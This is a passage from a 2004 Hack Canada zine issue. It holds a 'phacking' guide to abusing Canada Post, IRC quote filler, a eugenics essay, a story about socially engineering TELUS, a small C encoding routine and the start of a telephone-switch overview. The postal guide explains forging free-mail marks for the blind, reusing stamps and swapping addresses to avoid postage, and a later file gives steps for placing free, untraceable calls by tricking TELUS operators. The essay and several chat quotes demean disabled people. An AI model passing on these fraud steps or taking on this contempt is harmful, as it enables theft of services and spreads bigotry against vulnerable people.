2000 GOTO 1640
WWW.HACKCANADA.COM
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<kybo_ren> anybody know kank's mom name, i'll get it tatooed on my arse PLEASE?
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
___________________________________________________
| ..... |
| CYB0RG/ASM : : |
| 2oo4-o8-o1 : : |
| :...: |
| |
| Canada Post: |
| A Phackers Guide |
| V0O 0O1 |
| |
| |
| |
| || | ||| | || | |
|___________________________________________________|
Introduction (o)
Disclaimer (1)
Anatomy of a Delivery (2)
Faster Routing (3)
Mail for the Blind (4)
Stamp Recycling (5)
No Postage Necessary (6)
Oldest Scam in the Book (7)
POSTpac / POSTroute / POSTcct (8)
Phonebook (9)
Resources (10)
___ ______________
(( o ) (( Introduction )
PHACKING is the art of Postal Hacking; or manipulating the mail system in a
variety of high and low tech ways; sometimes legal, sometimes illegal;
sometimes to get free delivery and sometimes to get faster delivery.
Phacking has been around since the first stamps were invented in 1847 and were
shortly thereafter forged by hand. Since then, Phacking has progressed to a
very high-tech level thanks to an assiduous but predominantly unheard of band
of pioneers such as The Postmasters, PhedEx, Zip C0de, PoD, Dr. Sort, Post
Officer, C-Rate, X-Press, Maleman, NonFunc, and The Courier). Phacking has
certainly been kept fairly hush-hush. Indeed, most people have never even heard
of Phacking, and I have certainly never seen any Canadian Phacking information,
much less met or spoken to a Canadian Phacker. Heck, try to find ANY Phacking
information on the 'Net and you will likely come up empty-handed.
At any rate, having never worked in the postal industry and having never spoken
to a Phacker, I certainly do not have the knowledge of the postal systems
inner-workings that would allow me to present any truly advanced Phacking
techniques. The Phacks included are what I could come up with based on the
research I have done so far and are all quite primitive. Hopefully, those in
the know will contribute information for a future version of this file, and
I will continue to learn more when I have absolutely nothing better to do
with my time.
Honestly, I'm sure you're asking yourself "why bother? snail-mail is so
obsolete and snail-like". I hear ya', don't ask me why I do the things I do.
Hackers are just an intellectually migratory life form with a positive
tropism for computers. I guess it's the journey and not the destination or
something. So, uh, let's get postal.
___ ____________
(( 1 ) (( Disclaimer )
Phucking with the mail is generally a VERY SERIOUS CRIME. Keep this in mind --
sending a letter for free is easy, but habitually abusing the postal service
will land you in a heap of trouble. You're far better off playing with the
tricks to get your mail routed faster and leaving the free-mail scams to those
who enjoy prison. That being said, I accept absolutely no responsibility or
liability for your actions or for the applicability, legality, or use of the
information in this document. Fairly warned be thee, says I. Now phack-off.
___ _______________________
(( 2 ) (( Anatomy of a Delivery )
Canada Post Corporation (CPC) delivers approximately 8 billion pieces of mail
every year. There are numerous places for things to go horribly wrong,
resulting in slower delivery, or even failed delivery. The following diagram
shows the highlights of a letters adventure as near as I've been able to
determine it. I also detail each stage of the journey and point out potential
postal pitfalls, as well as opportunities for you to improve your letters
chances for successful and "speedy" delivery. Please note that this analysis
is not comprehensive and may even contain factual errors, but it is the best
I've been able to piece together thus far as a CPC outsider.
Letter -----(a)----> Mailbox -----(b)----> Delivery Facility -----(c)---.
:
:
:
:
:
,---- MLOCR <---(e)--- MARK <---(d)--- Distribution Centre Facility <---'
:
:
:
: .--(f1)--> BCS --.
: / \
: / \
'------<----(f2)---> LSM ----->-----(g)-----> Destination Facility -----.
\ / :
\ / :
`--(f3)--> FSM --' :
:
:
:
Addressee <----(i)---- Carrier <----(h)---'
a) Letter ---> Mailbox
This is you, taking your letter to the mailbox... DUH! Note the pick-up
days and times which are usually labeled on the mailbox. Not a lot of
things can go wrong at this stage and it would take a very special kind
of retard to screw up the mission at this juncture.
b) Mailbox ---> Delivery Facility
The letters in the mailbox are picked up on schedule and moved by a CPC
van to a CPC Delivery Facility.
c) Delivery Facility ---> Distribution Centre Facility
A Distribution Centre Facility (DCF) is a major postal facility where mail
is received, sorted, handled and sent to, or received from, a group of
dependent postal facilities.
d) Distribution Centre Facility ---> MARK
At the DCF is where your letter meets the MARK. The MARK facer-canceller
automatically cancels stamped letter-size mail and arranges letters so
that they all face the same direction. Using phosphorescent detectors,
the MARK determines if a letter is stamped by detecting minute traces of
phosphor in stamps. Unstamped mail is sorted into a separate bin for human
processing.
e) MARK ---> MLOCR
From the MARK, your letter travels to the Multi-Line Optical Character
Reader (MLOCR) machine. This machine reads the complete address on a
properly addressed mail item and encodes the corresponding fluorescent
bar code. If you don't want a human messing with your mail and slowing
things down it is critical that you address your mail in a clear and
proper manner so that the MLOCR can read the address correctly. If the
machine can't read it, then a human is given a fraction of a second to
decipher the Postal Code and key it in. One typo and your letter may end
up in Kugluktuk.
f1) MLOCR ---> BCS
The Bar Code Sorter (BCS) machine sorts high volume mail such as bar coded
Business Reply Mail (BRM).
f2) MLOCR ---> LSM
The Letter Sorting Machine (LSM) sorts mail by reading fluorescent bar
codes printed on letter-sized mail.
f3) MLOCR ---> FSM
Flats Sorting Machine (FSM) A machine that sorts mail flats (larger than
letter-size items) by reading addresses and/or the bar codes printed on
such mail, and encodes mail with the bar code as required. Properly and
legibly formatting your destination address will ensure your letter gets
sorted quickly and correctly. Or better yet, barcode it yourself. More on
that later.
g) BCS / LSM / FSM ---> Destination Facility
After being sorted at the Distribution Centre Facility, your letter is
forwarded on to its destination Delivery Facility.
h) Destination Facility ---> Carrier
The Letter Carriers retrieve the mail for their route from this delivery
facility. This is the facility from which the mode of delivery emanates
(e.g. location of postal box, origination of the rural route or letter
carrier route) and can include urban postal stations, letter carrier
depots, and rural postal facilities.
i) Carrier ---> Addressee
Postman Dan carries the letter to the person's mailbox that you addressed
it to. Postman Dan might shoot his co-workers and get indicted before
even hitting the street or he might trade his mail for crack cocaine. =/
As you can see, it's a miracle any letters ever get delivered at all, what
with those humans in there always bungling things up. Read on to learn what
you can do to get some of those post-office philistines out of the loop.
___ ________________
(( 3 ) (( Faster Routing )
Let's face it; humans are slow, fat, lazy, and often not too bright. When you
want the job done right, machines are faster and sexier. It's just a fact.
This holds especially true in the world of Canada Post.
There are some simple (and legal!) things you can do to ensure your letter is
handled by as few humans as possible. The benefit here is not only faster (and
sexier) delivery, but also, if you are pulling some of the other tricks in
this document, it is often to your benefit to have as few postal-workers as
possible scrutinizin' and molestin' your "handi-work". So, just follow the
tips and the faster it'll ship...
Properly format your mailing addresses:
. Type (or print clearly) the address all in uppercase.
. Format address with a uniform left margin.
. Use proper Unit identifiers (APT = Apartment, SUITE = Suite, UNIT = Unit).
Unit number is placed before the civic number (official number assigned to
an address by the municipality) with a hyphen between, OR after the Street
Type, using an acceptable Unit identifier (ex. APT 69).
. Use proper Street Type identifiers (ST = Street, AVE = Avenue, BLVD =
Boulevard).
. Use proper Street Directions (E, N, NE, NW, S, SE, SW, W).
. Post Office Boxes are indicated in the form "PO BOX 111" and followed with
the Station or Retail Postal Outlet where appropriate (STN = Station, RPO =
Retail Postal Outlet).
. Rural Routes should be indicated in the form "RR 2" and followed with the
Station or Retail Postal Outlet where appropriate.
. City, Province, and Postal Code should all be on the same line with two
spaces between Province and Postal Code. Use the appropriate two character
Province Code (AB, BC, MB, NB, NF, NT, NS, NU, ON, PE, QC, SK, YT).
. Addresses must be less than 40 characters per line, including spaces.
. Postal codes should be printed in upper case with the first three
characters separated from the last three by one space (no hyphens).
. Do not use punctuation unless it is part of a proper name. Never use the #
symbol either.
. Use monospace (non-proportional) fonts such as Courier.
. All characters must be larger than 2 mm and smaller than 5 mm (10 to 12
point). Return addresses may use smaller characters and must not be larger
than the destination address.
. Space between address lines must be at least 0.5 mm but no more than one
blank line.
. Return Addresses are formatted in the same way as the destination address,
and located in the top-left corner of the envelope, clearly separated from
the destination address, or on the back of the envelope at the top.
If you're still confused, check out the "Canadian Addressing Guide" available
from Canada Post Corporation.
Ok, that was pretty basic stuff and it will certainly help the MLOCR (Multi-
Line Optical Character Reader) read your address, but to make it completely
foolproof you'll want to use...
- BAR CODES -
Bar codes are the miracle of modern science that, among other things, would
have the checkout lines at the grocery stores moving blazing fast if it
weren't for the ignorant masses holding things up while they piss around with
their fooking cash cards and wait to be authorized at 2400 baud by a system
overloaded with hose-monkeys eager to share their spending habits with Big
Brother and whoever else might want to buy their info for some nefarious
purpose. But I digress, Bar Codes in the postal world are a godsend. Bar Codes
have gotten the mail moving through the postal system faster than lead from a
disgruntled postal workers .44 caliber sidearm. Ok, maybe not that fast. How
about faster than a snail on methamphetamine? Awe jeah. That is fast.
Canada Post uses a barcode standard known as the "4-State Barcode". The 4-State
barcode is a height modulated barcode consisting of both alpha and numeric
character sets. This code may be applied by the customer, or by Canada Post's
automated sorting equipment. A properly designed and rendered barcode will
allow the FSM (Flats Sorting Machine) to sort the mail items based on the
4-State barcode thereby increasing the speed at which your letter will flow
through the system.
I was going to give a detailed guide to creating your own 4-state barcodes, but
it truly bores the hell out of me... maybe some other time. So for now I will
leave you to refer to the Canada Post 4-State Barcode Handbook (available from
Canada Post) for design information.
___ ____________________
(( 4 ) (( Mail for the Blind )
Canada Post offers free mail services for blind people and institutions
serving the blind. This service is available within Canada, to the U.S.A., and
to international destinations at no charge when sent by surface mail.
Mail for the blind is generally indicated on the envelope with a simple rubber
stamp. The printing or inkpad stamp should look like this in Canada:
______________________________________
| |
| LITERATURE FOR THE BLIND |
| |
| DOCUMENTATION À L'USAGE DES AVEUGLES |
|______________________________________|
In the United States, they tend to look like this:
___________________________
| |
| FREE MATTER FOR THE BLIND |
| AND PHYS. HANDICAPPED |
|___________________________|
A non-serif (i.e. Arial) style font is typically used, and the mark is placed
in the upper right hand corner of the envelope where the postage stamp would
normally be placed. Even a novice counterfeiter should have no problem
duplicating this mark with a basic graphics program and a printer.
According to Canada Post Corporation only these items may be mailed using this
free service:
. Books, periodicals, papers, and unsealed letters impressed in Braille or
similar raised type.
. Tapes and records sent by a blind person.
. Plates for printing literature for the blind.
. Tapes, records, and special writing paper intended solely for the use of
the blind when mailed by, or addressed to, a recognized institution for
the blind.
Of course only a callous asshole would abuse this service and risk ruining it
for those who truly need it.
___ _________________
(( 5 ) (( Stamp Recycling )
Reusing stamps not only makes good economic sense, but good environmental
sense as well. Save a tree, mail for free! Here are a few methods for reusing
those stamps which one can occasionally get away with:
A. Someone sent you a letter and the postmark didn't even hit the stamp.
Well, just cut that stamp out and tape or glue it on the letter you want
to send.
B. If the postmark damage to the stamp is not too severe, you can often use
an eraser to scrub off the postmark.
C. Tape over your stamp with "magic tape". You know, that transparent tape
that is easy to peel off. Do a good job of it so it's not too noticeable.
Your recipient will be able to peel that tape off and reuse the stamp.
"Hey, sometimes the dang stamp just won't stick by itself."
D. Canada Post is constantly raising the price of stamps by a penny or two
in an effort to screw the postage paying consumer. They then declare that
you must buy 2 cent stamps to use in conjunction with your old stamps that
don't quite meet the new postal rate. Often people end up buying new
stamps and the old stamps go to waste. Or, they end up doubling up the
old stamps they have and grossly exceeding the minimum required postage
just to ensure the letter gets delivered. Well, I say phuck that and
phuck Canada Post. Use your old stamps as you normally would. Canada Post
does not waste their time and money returning a letter that is just a few
cents short on postage.
___ ______________________
(( 6 ) (( No Postage Necessary )
Wouldn't it be nice to just mail stuff without worrying about postage at all?
Well, some people have that privilege. The "Franking Privilege" is a statutory
privilege available to the Governor General (http://www.gg.ca/), the secretary
to the Governor General, Speaker or Clerk of the Senate or the House of Commons,
the Parliamentary Librarian or Associate, members of the Senate and of the
House of Commons, and certain privileged others. Franking privilege allows for
the marking on an item of mail with an official signature, initials or sign
(franking) indicating the right of the sender to free mailing privileges. If
you knew what a "frank" looked like you could probably send mail for free this
way. I'd never seen a piece of "franked" mail so I decided to write a letter
to the Governor General (currently Adrienne Clarkson) with some suitable social
engineering and see if I could get her to write back using her franking
privileges. As an added bonus there is no postage necessary when writing to
the Governor General of Canada either so it didn't cost me anything.
Her Excellency the Right Honourable Adrienne Clarkson
Governor General of Canada
Rideau Hall
1 Sussex Drive
Ottawa, Ontario
K1A 0A1
Of course my social engineering is first-class and in less than a week I had
received an autographed image of her sexcellency Ms. Clarkson in an envelope
which had been franked by the secretary to the Governor General. The frank
mark was stamped in red ink and was basically like this:
<illegible signature, looks like "Bebars Wack">
04.07.13 Secretary to the Governor General
Secretaire du Gouverneur General
Ottawa, Ontario K1A 0A1
It is interesting to me that the date of mailing is built into the stamp.
Obviously one of those fancy stamps that has the little dials to set the date,
but I've never seen one built into a larger stamp like this. Also, the name
in the frank mark is not the same name or signature as the secretary that
responded to my letter. Anyway, if you were trying to mail a letter
fraudulently "franked" with the secretary to the Governor General's "frank
mark" on it, I would think your chances for success would be very slight
unless you were to drop the letter in a mailbox outside of Rideau Hall. But
who knows?
___ _________________________
(( 7 ) (( Oldest Scam in the Book )
Surely the oldest scam in the Phackers bag of tricks is to switch the return
address with the destination address and mail it without postage. CPC will
have it Returned to Sender (RTS) free of charge. You would think this would
only work when it is mailed in the same city as the intended recipient,
however, it has been successfully perpetrated city to city. Yeah, that is
totally retarded.
___ _______________________________
(( 8 ) (( POSTpac / POSTroute / POSTcct )
POSTpac is Canada Post Corporations packet switched data network. It is based
on the X.25 protocol and its DNIC (Data Network Identification Code) is 3038.
CPC operates their Wide Area Network based on Motorola's Codex Frame Relay
Switch and also included is a large FDDI (Fiber Distributed Data Interface)
based campus which services over 3000 users supporting protocols such as Novell
IPX, TCP/IP, DECnet, LAT, and XNS. The FDDI LAN uses a token ring media access
control protocol and operates at 100Mbps.
Network management platforms such as Digital Polycenter, SunNet Manager, HP
Openview, Cisco Works, and Synoptics Optivity are used for managing and
troubleshooting the network. The Digital POLYCENTER (DECmcc) Network Management
Platform runs on a Digital VAX Model 4000-90 for the purpose of managing and
monitoring DECnet traffic over CPC's POSTcct and POSTpac networks. Cisco Works
and Synoptics' OPTIVITY Network Management Platforms are run on Sun Sparc 10
workstations. Chipcom's On-line Hub Management Module is utilized on an HP
Openview Network Management Station.
Other network hardware includes DECnet Phase IV routers and end nodes, X25
Routers/DEMSAs, as well as Datability Terminal Servers and the complete line
of Cisco Multi-protocol Router Products. Novell networked PCs are used for the
purpose of X-Windowing to the various Network Management Platforms using the
TCP/IP network transport.
Clearly one bitching high-end network. And that is all I know about that. Good
luck finding further information on this topic.
___ ___________
(( 9 ) (( Phonebook )
8oo-267-1177 Product & Sales Info / Customer Service
8oo-26o-7678 Product & Sales Info (business)
416-979-8822 Customer Service (international)
8oo-267-2797 Customer Service (TDD)
8oo-565-4362 Product & Sales Info (stamps & collectibles)
877-376-1212 Product & Sales Info / Support (epost)
877-269-9711 Product & Sales Info (epost fax)
888-55o-6333 Distribution Services: Priority Courier/Xpresspost/Skypak/Parcels
8oo-267-7651 Billing & Credit
613-734-9o92 Billing & Credit Fax
613-734-8888 Corporate Resource Center
877-2o2-2292 Free order entry software (eSOM)
8oo-277-4799 Free distribution services software (Expediter)
866-511-o546 PosteCS support (web secure mail & e-messaging)
8oo-363-3459 Address Management Help Line
____ ___________
(( 1o ) (( Resources )
Canada Post Corporation Website - http://www.canadapost.ca
Postal code lookup, postal outlet lookup, asstd. reference materials, ...
epost - http://www.epost.ca
Receive and pay your bills online. Good grief, like I'd trust CPC with that
kind of information.
A Brief History of Postal Hacking - 2600 Magazine, Vol.15-No.1, Spring 1998
Postal Hacking - 2600 Magazine, Vol.8-No.3, Autumn 1991
Postnet Programs - 2600 Magazine, Vol.8-No.4, Winter 1991-92
Off the Hook, December 18, 1991
http://www.2600.com/offthehook/1991/1291.html
8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Copyright (c) 2oo4 Hack Canada
www.hackcanada.com
|| | ||| | || || |
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<theclone> life is like a box of styrofoam peanuts. It's messy & sticks to things.
<tek> hahah
<tek> that so sounds like a wizbone quote
<aestetix> haha
<theclone> nope I thought of it just now
<tek> wow
<tek> you're turning into him
<theclone> rahhhh monster
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
Canada... No Fetus Can Beat Us
"EDMONTON, ALBERTA -- The following five paragraphs are excerpts from a story
that appeared in Sunday's Globe and Daily: Canada's health-care system is
sliding toward Nazi-style eugenics by encouraging parents to abort disabled
fetuses, a University of Victoria academic says.
In a speech to the University of Alberta, professor of social work Tanis Doe
said the widespread practice of pre-screening pregnant women and their
offspring for genetic diseases has turned into a system for purging society
of the disabled. "Women are expected to -- pressured to -- abort pregnancies
when fetal disability is diagnosed," said Ms. Doe, who is herself deaf and
confined to a wheelchair.
"But minimal support is available to raise children with disabilities. Eugenics
was practiced in the U.K., Canada and the United States before the rise of
Hitler. So what has happened since then is a continuation of the sterilization
practices that we have only recently acknowledged." Ms. Doe said there is
widespread acceptance in the western world of the idea that disabled fetuses
should not be brought to term. Entire article: "Professor says Canada sliding
into eugenics" (http://www.inclusiondaily.com/news/04/red/0316a.htm)
As I read this I had a flash back to my drive home a few days earlier. On the
road, driving in the middle of a lane, was a man in a motorized wheelchair. I
assumed from the fact that he was not on the sidewalk, not wearing a helmet,
and not on a residential street, that he must have also been retarded. This,
I thought, was Darwinism at work, and it was good.
Eugenics is not something that should be feared. Evolution is not able to work
in a society that takes care of the weak and frail. In the wild, animals have
to struggle to earn the right to breed, and only the strong offspring are left
to grow up and do the same. The systems we have in place protect the weak and
the old; those that shouldn't be.
A woman who carries the child within her body should have the right to know
what kind of child she is carrying. A child that has genetic defects becomes a
burden on society and on the woman forced to raise the child. Society more
often than not then has to help the mother who cannot raise a child so needy.
Screams of disgust, and finger pointing towards Hitler's agenda have branded
Eugenics. The world doesn't need breeders in the first place. It needs children
who will require constant care throughout their lives even less. The welfare
system is filled with enough single moms with children who are simply lazy and
stupid. I'm thrilled Canada is progressive enough to have safe abortion clinics
for women who need them.
"Canada is one of the very few countries in the world that has NO criminal law
restricting abortion at all. We first liberalized our law against abortion in
1969; then our Supreme Court threw it out completely in 1988. And we've been
doing just fine without it. In the 11 years since we began our great experiment,
we've found that doctors and women exercise the right to abortion responsibly,
without the need for any legal restrictions. We don't need gestational limits.
We don't need waiting periods. We don't need parental or spousal consent laws.
And we don't need restrictions on certain types of abortions."
(http://www.prochoiceactionnetwork-canada.org/Canada.html)
Ideally medicare would pay for tubal ligations. Women who choose not to breed
should be encouraged, not held back. Allowing a woman to end a pregnancy for
any reason is a good thing. Having a child is burdensome enough without adding
a lifetime of care-giving to the mix. Yeah Canada!
MsOgynis, July 27th, 2004, www.smartestgirls.com
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<semen> My sister has a client right now.
<semen> So I stay in the living quarters
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
How I Social Engineered my Telco (TELUS)
into admitting I had a tap on my line
The Clone, 2004-06-01
Phone service isn't getting hooked up until tomorrow.
To make a long story short, Telus called me today to verify for the third
time, our service address. So I called back and did it. I asked why there
was a problem, and the associate told me it was due to some software issues
with my home line and that Telus would need an extra day to g
et things
sorted out. After being put on hold for 20 minutes, he came back and then
told me that we can expect service by Wednesday. Since he was wasting all
my time, I let him go.
After work I called back and complained and demanded that the $35.00 charge
for hook-up be removed because it caused me a huge amount of inconvenience.
The woman on the other end of the phone went on this huge rant about the
service charge being CRTC regulation, a policy, blah blah blah. Following
her policy BS, I asked for a manager.
She said "well the manager is going to tell you the same thing I just told you."
I retort "You know, I work in the customer service industry too. And what you
just said to me, the 'my manager is going to tell you the same thing' is text
book example of BAD customer service. Just give me the manager." So she then
explained that she'd firstly have to get manager approval in order to do this.
Of course she didn't get this so-called "approval" so I ended up being stuck
with her.
I asked her a few questions that intrigued me about why my line had "software
issues". And I ended up asking if she saw the following things on my line: "pen
register" "soft tap" and she admitted that yes it's true. There is "PEN REG" on
my account next to WIP; Work In Progress.
This means my line was being tapped. No question about it. A pen register is
basically software at the switch that monitors #'s that "suspects" with Telus
have on their phone lines. If you have a pen-register monitoring you, it
monitors all #'s dialed.
Out of anger and disappointment, I cancelled the service transfer.
The End.
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<Smev> hmm how big of a tower can I legally erect in my backyard ?
<theclone> 6"
<theclone> uncut
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
/* ASCII Armour Encoding, (C) 2004 HardCore SoftWare
These are some small, efficient "plug and play" functions
for encoding binary data in a safe ASCII transport medium.
It is somewhat similar to base64 encoding, but simpler.
This software is Copyright (C) 2004 By Hardcore Software.
The software is distributed under the terms of the
GNU General Public License. See the website www.gnu.org
for more information.
This function encodes a collection of binary data stored at
the memory location "in", of length "len". It stores the
ASCII encoded string in the memory location "out". "out"
should have at least %50 more space available than "len".
void encodearmour(char *in, int len, char *out);
This function decodes an ASCII encoded string created by
the encodearmour() function, stored in the memory location
"in" and stores it into "out". "out" should have as much
space as strlen(in). This function returns the number of
bytes of data stored into "out".
int decodearmour(char *in, char *out);
-Fractal
*/
static char map[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
klmnopqrstuvwxyz0123456789+*";
static char revmap[] = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x3F
\x3E\0\0\0\0\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\0\
0\0\0\0\0\0\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A
\x0B\x0C\x0D\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x1
8\x19\0\0\0\0\0\0\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x
23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\
x31\x32\x33";
void encodearmour(char *in, int len, char *out) {
int curpos, bitoff, curbit, t=0;
if (len == 0) {
*out = '\0';
return;
}
curpos = curbit = 0;
while(1) {
curpos = curbit / 8;
bitoff = curbit % 8;
if (curpos == len-1) {
if (bitoff == 2) {
t = in[curpos] & 63;
*(out++) = map[t];
}
else if (bitoff == 0) {
t = (in[curpos] & 0xFF) >> 2;
*(out++) = map[t];
*(out++) = map[(in[curpos] & 3) << 4];
}
else if (bitoff == 4) {
t = (in[curpos] & 15) << 2;
*(out++) = map[t & 63];
}
break;
}
if (bitoff == 0) t = (in[curpos] & 0xFF) >> 2;
else if (bitoff == 2) t = in[curpos] & 63;
else if (bitoff == 4) t = ((in[curpos] & 15) << 2) | ((in[curpos+1] & 0xFF) >> 6);
else if (bitoff == 6) t = ((in[curpos] & 3) << 4) | ((in[curpos+1] & 0xFF) >> 4);
*(out++) = map[t & 63];
curbit += 6;
}
*out = '\0';
}
int decodearmour(char *in, char *out) {
int curbit=0, t, c1=0, c2=0, bytes=0;
if (*in == 0) return 0;
while(*in != '\0' && *in != '\n' && *in != '\r' && *in != ' ') {
t = revmap[(int) *(in++)];
if (curbit == 0) c1 = t << 2;
else if (curbit == 2) c1 |= t;
else if (curbit == 4) {
c1 |= t >> 2;
c2 = (t & 3) << 6;
} else if (curbit == 6) {
c1 |= t >> 4;
c2 = (t & 15) << 4;
}
curbit += 6;
if (curbit >= 8) {
*(out++) = c1 & 0xFF;
bytes++;
c1 = c2;
c2 = 0;
curbit %= 8;
}
}
return bytes;
}
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<theclone> fraud is jealous. he wants to be a cum sponge. fraud you better out
slurp Kiltman or else your job is in jeopardy
<fraud> i invented the uberslurp.
<Kiltman> I can outsuck a boatload of chinese whores with my eyes closed!
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
------------------------------------
Un-activated Telus cellphone exploit
------------------------------------
by Tr00per
----------
Disclaimer: The following words are intended for informational purposes only.
Don't do illegal things. They're bad.
Hi all! Recently I aquired an old Telus Pay and Talk phone, that was but is
no longer activated. I've been planning on gettin a pay'n talk startup kit
but have yet to do so because Im poor. After hangin out with steelethan on
a boring walk home, I realized that this cell I have was still in my pocket.
I had this idea, fooled around, thought it wouldnt' work, but like always,
I was wrong. There is a way to get free phone calls on a non-activated Telus
cell, and here it is:
-When you dial any #, it directs you to an automated Telus voice saying to
call *611, so I do.
Call *611, press 1 for service in English (Or w/e you speak)
Press 2 for pcs/cellular client
Press 3 for landline option stuff
Press 3 again for landline stuff
It will then connect to you to this automated voice where you have to SPEAK
CLEARLY. I hate those systems. Anyway say "service operator", then when the
voice comes again asking what kind of operator, repeat "service operator".
When she asks you If you want a service op for your business line or home
line, say "Home". You will then be connected to a Telus operator. Say you
were getting transferred to 411 and you must have been transferred to the
wrong place. Make something up, It's VERY easy to get them to transfer you
to 411 directory assistance. Once you get to 411, you know what to do :).
Press 1 to be directly connected to the number. It works every time, or has
for me anyways. The ANI info showing up on my home phone that I called was
blank, it will have no phone # and just says "unknown caller". The other
great thing about this ..'feature' is (I think) that even if your phone IS
activated, you can use this to not get charged for your call, because calls
to *611 are free. (Never tried this though. Don't take my word for it).
I just thought I'd share this with you. There may be other ways to do this
and more things possible, Im not sure, let me know if you find anything else
interesting. It may/may not work someplaces. Im not sure. But in the 780
(hell yeah!) region it sure as hell does :)
*note: This will only work during telus business hours, I think they close
at 7pm.
Have fun :)
Shouts: Steelethan, Hades, The Clone, CybØrg/ASM, Kankraka, H1d30u5, Question,
and everyone involved in the Hackcanada/Nettwerked scene!
Credits: P1kmstr (thanks for the phone!)
-tr00per@sdf.lonestar.org-
2004-07-06
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<urinetrouble> for 15 bucks an hour, my mom gets beaten by crazy retarded people
<theclone> wow, she works at port9's school?
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
*> The Complete Guide to the GTD-5 EAX <*
"Every Phreakers wet-dream, and worst nightmare..."
Author: H1D30U5
Date:June 27 2004
Credits: Kankraka, The Clone, and Stony Plain Telus Employees. (780-963/968)
Shouts: CYB0RG/ASM, h410G3n, Alan, Tr00per, Question, Kybo, Persephone.
This File is Dedicated to all the phreakers and hackers that go out
and trash and then come to the meets and to the chat channels and
selflessly share the knowledge that they have gained. To those who sit
and wait for this knowledge to be served to them, you are not welcome.
Notes: This is a technical phile. There is no exploit that I have found yet
using this piece of equipment. if you're just out to exploit, scroll for a
while and go to the next file. This file was written for those who want
to learn, not just exploit.
Disclaimer: All of the information in this file was gained by legal means.
***c0nt3nt5***
GTD-5(r) EAX - INTRODUCTION 3
APPLICATIONS 3
HOW THE GTD-5 EAX WORKS 4
GTD-5 EAX - VALUE TO YOU 4
GTD-5 EAX - NETWORK ELEMENTS 5
CENTREX 6
REMOTE SWITCHING UNIT 8
HIGH SPEED ACCESS 10
ASYMMETRIC DIGITAL SUBSCRIBER LINE 10
INTEGRATED CIRCUIT-SWITCHED DATA 10
ISDN PRIMARY RATE ACCESS 11
SUPPRESSED RINGING 13
ISDN HARDWARE - BASIC RATE INTERFACE LINES 15
ISDN BRI CUSTOMER PREMISES EQUIPMENT 15
BRI PACKET SERVICES 15
APPLICATIONS - ISDN BRI CPE 18
APPLICATIONS - ISDN BRI DIGITAL CENTREX SERVICES 18
APPLICATIONS - ISDN BRI INTERNET ACCESS 19
APPLICATIONS - ISDN BRI D-CHANNEL PACKET SERVICES 19
APPLICATIONS - ISDN BRI TELECOMMUTING/HOME OFFICE 19
APPLICATIONS - ISDN BRI VIDEO CONFERENCING 20
OAM&P FEATURES - AUTO SPID 20
OAM&P FEATURES - X.25 LOCAL CHARGING PREVENTION 21
OAM&P FEATURES - BRI LINE MAINTENANCE 21
OAM&P FEATURES - BRI PACKET INTRANETWORK BILLING 21
OAM&P FEATURES - BRI REPORT 22
OAM&P FEATURES - RDT BASED bri LINE MAINTENANCE 22
OAM&P FEATURES - SINGLE AMA FOR INTRANETWORK MULTIVENDOR PACKET CALLS 22
OAM&P FEATURES - BRI TERMINAL PARAMENTER DOWNLOADING 22
OAM&P FEATURES - BRI TESTS 23
OAM&P FEATURES - X.75 AND X.75' UTILITY SUPPORT 23
VOICE FEATURES - BRI ADDITIONAL CALL OFFERING 24
VOICE FEATURES - BASIC CALL CONTROL CIRCUIT-SWITCHED SERVICES 24
VOICE FEATURES - CALLING NUMBER/NAME ID 24
VOICE FEATURES - EXECUTIVE OVERRIDE 26
VOICE FEATURES - BRI FEATURE KEY MANAGEMENT 26
VOICE FEATURES - BRI SYSTEM DEFAULT 28
SOFTWARE AND FEATURES 28
GTD-5(r) EAX - INTRODUCTION
The GTD-5 EAX is a family of scalable, flexible digital telecommunications
switching products that are designed to keep pace with technology advances.
The GTD-5 EAX supports local and long-distance voice and data traffic,
Internet access, and wireless and multimedia service. GTD-5 switches come
in a range of sizes from a remote line unit to a 150,000-line switch. The
systems' modular design, low operating costs and high reliability make them
ideal for service providers.
Flexible Architecture
The GTD-5's duplex architecture and modular design gives service providers
the ability to add features and customize services according to their
